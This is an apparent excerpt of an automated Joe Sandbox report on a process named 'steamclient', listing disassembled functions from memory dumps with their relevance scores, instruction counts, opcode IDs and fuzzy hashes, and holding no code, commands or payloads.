                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3081a06d85488c3962eb4e0a6b01c9a85e12f038a422d7d164972abf716e077b
                                                                    • Instruction ID: 420c8bf6af4891a8d6a0201f859b5288586f149fda013eac16c4179a8ab4f41a
                                                                    • Opcode Fuzzy Hash: 3081a06d85488c3962eb4e0a6b01c9a85e12f038a422d7d164972abf716e077b
                                                                    • Instruction Fuzzy Hash: 6FD0E205FAB91F81E57933F928764BCB2409F8CB18FE70572E50C800EAAC5E329945B3
                                                                    Function 00007FFD9B8A1BB0 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5aed10bb81f0f6b705e8d924a26448956ffa6ad39147f1e80df6d8165d9fa489
                                                                    • Instruction ID: d485951a444cdb974a1061f9d6e619e2cb3d45d7091b85ff00253021c640cf04
                                                                    • Opcode Fuzzy Hash: 5aed10bb81f0f6b705e8d924a26448956ffa6ad39147f1e80df6d8165d9fa489
                                                                    • Instruction Fuzzy Hash: 13C0123061180C8FCA48EB28C8A4D1473E0FB1D304B9A0094E00ECB2B1E62AECC2CB40
                                                                    Function 00007FFD9B8A0730 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002B.00000002.3260474380.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_43_2_7ffd9b8a0000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 88a0c4741b636eb5f01c4778584042cc197c8b71ee4301ca202ebb54c21d0eff
                                                                    • Instruction ID: 2b9afdb4dfc6492413999f5864f49885d8143ca1ae1f9336df808bb3612066f9
                                                                    • Opcode Fuzzy Hash: 88a0c4741b636eb5f01c4778584042cc197c8b71ee4301ca202ebb54c21d0eff
                                                                    • Instruction Fuzzy Hash: 4BB01200DD740F00D43433F5186606470009B8D200FC60570E40880095DC4D12944262

                                                                    Executed Functions

                                                                    Function 00007FFD9B8AE241 Relevance: .4, Instructions: 442COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e57a6038e9a17f3b531feef35a24f48131f3875530f570af583d343c9052d069
                                                                    • Instruction ID: 2f8d0f1c3199a205eff50bb099dbbf8d79c88facf0ace8a819fda11700facdd2
                                                                    • Opcode Fuzzy Hash: e57a6038e9a17f3b531feef35a24f48131f3875530f570af583d343c9052d069
                                                                    • Instruction Fuzzy Hash: A9C1E121B2D65A0BE32C5AACCC920B573D1EFD6306B658F7DD4D7C3457E928E5038291
                                                                    Function 00007FFD9B8AE275 Relevance: .3, Instructions: 313COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b4f797e14c2b9127c08047412afa3aab2c8a3db73def37a38dac21cf917da201
                                                                    • Instruction ID: 3fe8e89c06c7401dfa7d6f1d710d346e71fdd8a7571a5ab878f5a5d2f01df699
                                                                    • Opcode Fuzzy Hash: b4f797e14c2b9127c08047412afa3aab2c8a3db73def37a38dac21cf917da201
                                                                    • Instruction Fuzzy Hash: A581A371F2D7590BE33C4AAC8C9207173D5EBC6206B658A3DD8D7C3597E924F8074191
                                                                    Function 00007FFD9B8B0439 Relevance: 1.3, Strings: 1, Instructions: 29COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M
                                                                    • API String ID: 0-3664761504
                                                                    • Opcode ID: da560e191d0765ffd899dfc8083f2e2eeae8d5feb9b3f9a1addcea3e71324014
                                                                    • Instruction ID: fe2b3b0ccce8d0d362054882f64c3d15f334bf02cd5b21270097db750f8f4e08
                                                                    • Opcode Fuzzy Hash: da560e191d0765ffd899dfc8083f2e2eeae8d5feb9b3f9a1addcea3e71324014
                                                                    • Instruction Fuzzy Hash: 90F0657190F7C44FC71AAA3588698547F60EF6761174A52EFC045CF1A3DA2DD885CB41
                                                                    Function 00007FFD9B8AF1E9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: I
                                                                    • API String ID: 0-3707901625
                                                                    • Opcode ID: 325cd9a71d8dceba01955193c869101c91ffe8b33d10d07bd4121a6a1edab501
                                                                    • Instruction ID: b7fb2478235d9d5e2add0d205bacd007ceffac7841748b8d34e1f9fbd17ef69d
                                                                    • Opcode Fuzzy Hash: 325cd9a71d8dceba01955193c869101c91ffe8b33d10d07bd4121a6a1edab501
                                                                    • Instruction Fuzzy Hash: 07E09A7194B3C44FCB06AB3488698443FA0EE6B21078B42EEC04ACB0B3E62D884AC700
                                                                    Function 00007FFD9B8A8DD9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: I
                                                                    • API String ID: 0-3707901625
                                                                    • Opcode ID: 1e96ab717960bfe43a17488cd3bf87444d7729a600d89c50b6fadd83b27c824a
                                                                    • Instruction ID: f83952112470a6bcdb6e188fae10c02b0e1a5be5deaacc4fb953c7ec815697fa
                                                                    • Opcode Fuzzy Hash: 1e96ab717960bfe43a17488cd3bf87444d7729a600d89c50b6fadd83b27c824a
                                                                    • Instruction Fuzzy Hash: B4E0E56154F3D44FCB16AB7488698483FB0EE6B21078A41EEC089CF1B3E62D994AC711
                                                                    Function 00007FFD9B8A8F89 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: I
                                                                    • API String ID: 0-3707901625
                                                                    • Opcode ID: 3ef8ece588c84ae544eabd922c59fb37d6826fe330ce4da3a2e1ab0971adb64e
                                                                    • Instruction ID: 1720988998b89244be43c913e0cdbdaffbf75f7e7f18328337f23e8b4296bf09
                                                                    • Opcode Fuzzy Hash: 3ef8ece588c84ae544eabd922c59fb37d6826fe330ce4da3a2e1ab0971adb64e
                                                                    • Instruction Fuzzy Hash: 80E0927154F7D04FCB06DB7888698047FA0EE2720078B41EEC045CF1B3E62D8845C701
                                                                    Function 00007FFD9B8A54B8 Relevance: 1.3, Strings: 1, Instructions: 23COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: M
                                                                    • API String ID: 0-3664761504
                                                                    • Opcode ID: e0852ae24da35a45d98788b5fe54c5d06496605bfc7436ac97839bfc785b7295
                                                                    • Instruction ID: ea63c3859fb4f3e294851b9f7ba202825e97df5aea1b1252b0d9d2d5f34cb6da
                                                                    • Opcode Fuzzy Hash: e0852ae24da35a45d98788b5fe54c5d06496605bfc7436ac97839bfc785b7295
                                                                    • Instruction Fuzzy Hash: 6BE0CD716075444FCF24EA398458854BB90EF6721174553FDC05BCB1D6DE29D8C5C700
                                                                    Function 00007FFD9B8A8FE0 Relevance: .3, Instructions: 305COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c4f3ccf7adb837204df9d29f5d4de81d5abbc4cffa3b2994f0dc9793e07fe9c2
                                                                    • Instruction ID: fe35bd664dbece7d5c4316ebb2529d326fa9ba90a0073df8384711b427419c83
                                                                    • Opcode Fuzzy Hash: c4f3ccf7adb837204df9d29f5d4de81d5abbc4cffa3b2994f0dc9793e07fe9c2
                                                                    • Instruction Fuzzy Hash: 47A1A331B1890D4FDB98EB68C4A8AA977E2FF9C314F110579D41DC32A9DF38A842C790
                                                                    Function 00007FFD9B880A19 Relevance: .3, Instructions: 283COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3688704e66bfc1e30d581f6b2d9ef8b25ecbc35b32aea2955747ae387e0e9fb6
                                                                    • Instruction ID: 269e5ccbc5daf569e0379044951b62716c8e57c7e1dc714a4e3bdec64d0e0c58
                                                                    • Opcode Fuzzy Hash: 3688704e66bfc1e30d581f6b2d9ef8b25ecbc35b32aea2955747ae387e0e9fb6
                                                                    • Instruction Fuzzy Hash: C8710611F2EA4E0BE76866BC08652B576C2DF89B15F26027DD4EFC32E7DD2C69074241
                                                                    Function 00007FFD9B8807C5 Relevance: .2, Instructions: 244COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bb1348f01e1a6e35f450733f46ff5c0391e8f7e16b58805b053045686d65ec13
                                                                    • Instruction ID: d4d1032c9b2337de521b45c3b999bea85cb5025af2528d25c65d272dbe6f0570
                                                                    • Opcode Fuzzy Hash: bb1348f01e1a6e35f450733f46ff5c0391e8f7e16b58805b053045686d65ec13
                                                                    • Instruction Fuzzy Hash: 51618C32B1DA594FD765EB6C98556F93BE0FF88311B05007BD099C72A3DE24984783D1
                                                                    Function 00007FFD9B8A8FC1 Relevance: .2, Instructions: 208COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0985af56caada6c8674df67eb733549deb2458241ad4cef33b8ce616080d897e
                                                                    • Instruction ID: ee1f45e27c83ecdfd308e8e01be3cf1f6084d545cbbe9c1cdfbdcb66a1c9447e
                                                                    • Opcode Fuzzy Hash: 0985af56caada6c8674df67eb733549deb2458241ad4cef33b8ce616080d897e
                                                                    • Instruction Fuzzy Hash: 7F618431B1890E5FDB98EB58C4A8AA977E2FF6C300F514579D01DC72E6DF38A8428790
                                                                    Function 00007FFD9B8807FA Relevance: .1, Instructions: 132COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dc8f904bd5942805172efca87fc96c403a7a6746a98bd908f8d2dc25c1cd88a2
                                                                    • Instruction ID: 46ae212d155d497a32839784cde281a550a479cd8d5e41f06383b4ea85eb95b1
                                                                    • Opcode Fuzzy Hash: dc8f904bd5942805172efca87fc96c403a7a6746a98bd908f8d2dc25c1cd88a2
                                                                    • Instruction Fuzzy Hash: F3316F33B1E6A95FD321A76CA8650EA3BA0EF89639B05017BD0D5CA193DD24548B83D1
                                                                    Function 00007FFD9B8816C8 Relevance: .1, Instructions: 126COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8046bc21c42a249bbb15a8e94ddbba1ddc918f0ed2c7c60cfee80fb1a01bc80b
                                                                    • Instruction ID: b13c63fb0368766b3abfa9e0eb5645d20c5680ce81c9f9d8aeef47b5eaabdcaf
                                                                    • Opcode Fuzzy Hash: 8046bc21c42a249bbb15a8e94ddbba1ddc918f0ed2c7c60cfee80fb1a01bc80b
                                                                    • Instruction Fuzzy Hash: FF411571A18A8C8FDB49EB68C869BE87BB1FF29300F1501BED049C72A6DF782405C741
                                                                    Function 00007FFD9B8812B0 Relevance: .1, Instructions: 116COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a987f932881b5ea31b1d8f2f81258fe6213abd67a6853bfeaac59f6c0de2811e
                                                                    • Instruction ID: 4a2f18014b581b5c2c59a6aecd9ba538ed7ac8f1dc83d60daf4769c7211063d9
                                                                    • Opcode Fuzzy Hash: a987f932881b5ea31b1d8f2f81258fe6213abd67a6853bfeaac59f6c0de2811e
                                                                    • Instruction Fuzzy Hash: 3031F911B0CA294FE35CB768786A5F872C5DF88325F1100BBE01EC32E7DC28AC414285
                                                                    Function 00007FFD9B880830 Relevance: .1, Instructions: 104COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 69e30bc7c6da22fa2ebffef16bd921bb43a042177e04b37ca3aa6ff379d090a3
                                                                    • Instruction ID: cbeab6da51761279ef84ade8e99ff20e8599090dfdbe17bb115f9723bcb0d6dc
                                                                    • Opcode Fuzzy Hash: 69e30bc7c6da22fa2ebffef16bd921bb43a042177e04b37ca3aa6ff379d090a3
                                                                    • Instruction Fuzzy Hash: E5214E32B1D7984FD321A76CAC594FA3BA0FF89725B05017BD095C6193DE34554783D1
                                                                    Function 00007FFD9B8A45BD Relevance: .1, Instructions: 94COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d0f92fe2286bf8bf767b77b5eb9b9cab9d3e3614cca9e64904c1a5780674add6
                                                                    • Instruction ID: 2cb1ed96967a20cba5d3244f31b356c9d5edd67ef94e8198c92f7a52ab24f34b
                                                                    • Opcode Fuzzy Hash: d0f92fe2286bf8bf767b77b5eb9b9cab9d3e3614cca9e64904c1a5780674add6
                                                                    • Instruction Fuzzy Hash: 65219121B1A90E4BFE68BB9884E57B833C1EFAC745F190139D90DC32F6DE28AD464350
                                                                    Function 00007FFD9B8812E8 Relevance: .1, Instructions: 91COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b5ad210327f14a62729ac48ad5bb47d7b0b8c28c1ec375a0d5e05faeb62e707
                                                                    • Instruction ID: 6aec07b9f02653ee8255a436f99260429155f10a5df4d7fd2a66f1cead49fec5
                                                                    • Opcode Fuzzy Hash: 9b5ad210327f14a62729ac48ad5bb47d7b0b8c28c1ec375a0d5e05faeb62e707
                                                                    • Instruction Fuzzy Hash: 7821D420B18E1D0FE798B76C946AAB976C6EB9D315F5100B9E41EC32EADD28AC414251
                                                                    Function 00007FFD9B88155D Relevance: .1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 73c40891ec38eb92adfa41a40c05842ce65476db4d9d7c7763a46699fcd13b76
                                                                    • Instruction ID: ac6b88d872010f492bfa3557607f21820ec626e31666318ba58547b120fbd927
                                                                    • Opcode Fuzzy Hash: 73c40891ec38eb92adfa41a40c05842ce65476db4d9d7c7763a46699fcd13b76
                                                                    • Instruction Fuzzy Hash: E9210336B0A65D8FD702B7A8EC151C87B70EF95322F0545B3C154CB182EA305A5AC791
                                                                    Function 00007FFD9B881852 Relevance: .1, Instructions: 81COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1a976cc809efd49665fa2a539d702c22a6a01c8255a55b1ff3c7fe60bf652d7
                                                                    • Instruction ID: 2b6754cca33b2178581b4026a948ae36831f8c54fe61692813874bd49a431e12
                                                                    • Opcode Fuzzy Hash: e1a976cc809efd49665fa2a539d702c22a6a01c8255a55b1ff3c7fe60bf652d7
                                                                    • Instruction Fuzzy Hash: 9521BF61A18A898BF788DB68E8697E56FD1EB59304F6042BED009D72A6DFFC24058341
                                                                    Function 00007FFD9B893CA1 Relevance: .1, Instructions: 64COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b890000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 14b28e5d0c9168398294c5fbcc3cb10d5e3ff1d555cacfab133f5c6bff78d168
                                                                    • Instruction ID: 61f8bdc83ac783f95e5d7cdad67e6f97f72d59bea8d38be87009d9e1983397d6
                                                                    • Opcode Fuzzy Hash: 14b28e5d0c9168398294c5fbcc3cb10d5e3ff1d555cacfab133f5c6bff78d168
                                                                    • Instruction Fuzzy Hash: 3611D334E0D65E8FEB259BA4C8606BDBBB1FF45300F41067AC065D32D2DF7866058B81
                                                                    Function 00007FFD9B8AF8EC Relevance: .1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cfad49e61d4b04011183f671da29b06795a505924693a1eaaf243815ad2e5400
                                                                    • Instruction ID: f0c7dd2cdef43f2abcad14e1c09a74614e59af6e07c953635edf053758d2ce9c
                                                                    • Opcode Fuzzy Hash: cfad49e61d4b04011183f671da29b06795a505924693a1eaaf243815ad2e5400
                                                                    • Instruction Fuzzy Hash: 1D11B231B0C95A4FEB6CEB98C4756B47392EBA8310F150279E04DC72D6CE2C6D428751
                                                                    Function 00007FFD9B881588 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2913c4d2654616f04b5455c25069034b7aa0a1e9e227aa500bce8f93067037e6
                                                                    • Instruction ID: cef84b18a1bbb91a78464ae272a6fc36efdbad5a92b01f30b42711edd05d158b
                                                                    • Opcode Fuzzy Hash: 2913c4d2654616f04b5455c25069034b7aa0a1e9e227aa500bce8f93067037e6
                                                                    • Instruction Fuzzy Hash: CB11C235B0AB8D8FD702FBB8D82118CBBB0EF46311F1945B3D050DB292EA34A65A8751
                                                                    Function 00007FFD9B8AEF95 Relevance: .1, Instructions: 58COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0d123fa3591b1b6c5bce2e64fd37a01bef30af9df3618f2fab22deb5952e7b14
                                                                    • Instruction ID: 4ed5e23d623a6e3e052f3e02e2d62e4fd88a4f38dc433a91104caf82ec6d3d6e
                                                                    • Opcode Fuzzy Hash: 0d123fa3591b1b6c5bce2e64fd37a01bef30af9df3618f2fab22deb5952e7b14
                                                                    • Instruction Fuzzy Hash: 1A11A551B1CA804BE718AB9C542A37C37C1EFAC70AF10457DF58ED32D6CE689902429B
                                                                    Function 00007FFD9B881590 Relevance: .1, Instructions: 52COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac06d2304c5adcdd26b08ada7d75a93cafebe445c19c0acc930f62c304cdc889
                                                                    • Instruction ID: dfe49098d3fc3e990a042e627409b7678ce3821d5b425113ae34098feebc7bc7
                                                                    • Opcode Fuzzy Hash: ac06d2304c5adcdd26b08ada7d75a93cafebe445c19c0acc930f62c304cdc889
                                                                    • Instruction Fuzzy Hash: 1201C435B0A78D9FD702EBB4C86059D7BB0EF4A310F1545F3D054DB292EA34A649C751
                                                                    Function 00007FFD9B881598 Relevance: .0, Instructions: 46COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 02a25636cf148e84e81bc2171bd53fb8d1e92c3cfedeefedf2f4967126ce4622
                                                                    • Instruction ID: 7fc354ad301d49e3a16f1dee7317d5debd60e19ada1eee2ce8122030b3b7038a
                                                                    • Opcode Fuzzy Hash: 02a25636cf148e84e81bc2171bd53fb8d1e92c3cfedeefedf2f4967126ce4622
                                                                    • Instruction Fuzzy Hash: B7019E31A0E7899FD712EBB4C86059D7BB0EF0A310F1945E3D055DB292EA34AA49C741
                                                                    Function 00007FFD9B883F20 Relevance: .0, Instructions: 44COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: dd9041321513a680c1420a23ee94af5e99562b23d4085682d327ffe8c7689c56
                                                                    • Instruction ID: 95623499a22e5080911ac7889172c99036ad412460f29a9fc1d89b77a8ba3b60
                                                                    • Opcode Fuzzy Hash: dd9041321513a680c1420a23ee94af5e99562b23d4085682d327ffe8c7689c56
                                                                    • Instruction Fuzzy Hash: 10011E35A18D1CCFDB68EB58C8A1AAD73A1FFAC300F110169D00AD72A5CA38A901CF81
                                                                    Function 00007FFD9B8815A0 Relevance: .0, Instructions: 40COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4a660926753a8bfb327cd3da07225f6433a19e843931e924d9a56568e4c86461
                                                                    • Instruction ID: 40f620381fe763c9a319db955cb533fbcb1cb04222276d92e2d118ca20c3cbe5
